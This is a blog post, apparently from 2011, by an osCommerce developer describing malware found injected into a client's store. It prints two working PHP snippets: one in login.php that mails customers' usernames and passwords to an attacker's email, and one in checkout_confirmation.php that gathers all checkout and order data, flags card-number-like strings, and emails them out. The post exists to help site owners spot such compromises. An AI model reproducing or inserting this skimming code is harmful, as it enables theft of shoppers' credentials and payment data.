File injection – login.php and checkout_confirmation.php
Here’s a couple of little code snippets that I found on an osC store I was working on
login.php at line 23
if (isset($HTTP_GET_VARS['action']) && ($HTTP_GET_VARS['action'] == 'process')) {
$email_address = tep_db_prepare_input($HTTP_POST_VARS['email_address']);
$password = tep_db_prepare_input($HTTP_POST_VARS['password']);
@mail("XXXXXXX@gmail.com","www.XXXXXXXX.com ","username : $email_address \n password : $password");
The last line above was added in by our old friend the hacker and simple emails a customer’s username and password to his throwaway email address at Googlemail.
Then in the file checkout_confirmation.php at around line 55 he’s also added in this:
$msgz = "";
if (!isset($_SERVER)) { $_SERVERĀ = &$HTTP_SERVER_VARS; }
foreach ($_POST as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
foreach ($_GET as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
foreach ($order->info as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
foreach ($order->customer as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
foreach ($order->customer['country'] as $key => $value) { $msgz.="country-".$key." => ".$value."\r\n"; }
$msgz .= $_SERVER['HTTP_REFERER']."\r\n".$_SERVER['SCRIPT_FILENAME'];
if(preg_match('/[0-9]{12,19}|paypal/i',$msgz)) {
@mail('XXXXX@gmail.com','setoran',$msgz);
} else {
@mail('YYYYYYY@gmail.com','setoran',$msgz);
}
This baby catches all the information being passed from the checkout_confirmation.php page to the checkout_process.php file and emails it to one or other of his email addresses.
| Print article | This entry was posted by Graeme on January 22, 2011 at 12:09 pm, and is filed under Security. Follow any responses to this post through RSS 2.0. You can leave a response or trackback from your own site. |
No comments yet.
No trackbacks yet.
Store Pick Up Shipping Module – adding tax.
about 1 month ago - No comments
Recently looked at http://www.oscommerce.com/community/contributions,164 for a store pickup option – once installed this allows you to add an option to the checkout_shipping page so that customers can collect direct. You can add a fee for this but this cannot be made taxable. Here’s a little fix for this based on spu.php 1. Backup your original
script src=http://1see.ir/j/
about 6 months ago - No comments
Long time no write – but here’s another exploit. – maybe two. My clients’ hosting company contacted him regarding spam mail being sent from his account. After downloading his site I found a couple of exploits that had been popped in there: In the catalog/images folder there were three extra files *.php, *.phtml and *.ind
US States Drop Down for Payment Selection
about 1 year ago - No comments
I’ve just spent a happy twenty minutes setting up a drop down box of US States for use in a First Data Global Gateway Telecheck Payment module. This will display the full state name in an alphabetical list and pass the two letter, upper case abbreviation as the value. Save yourself some time and grab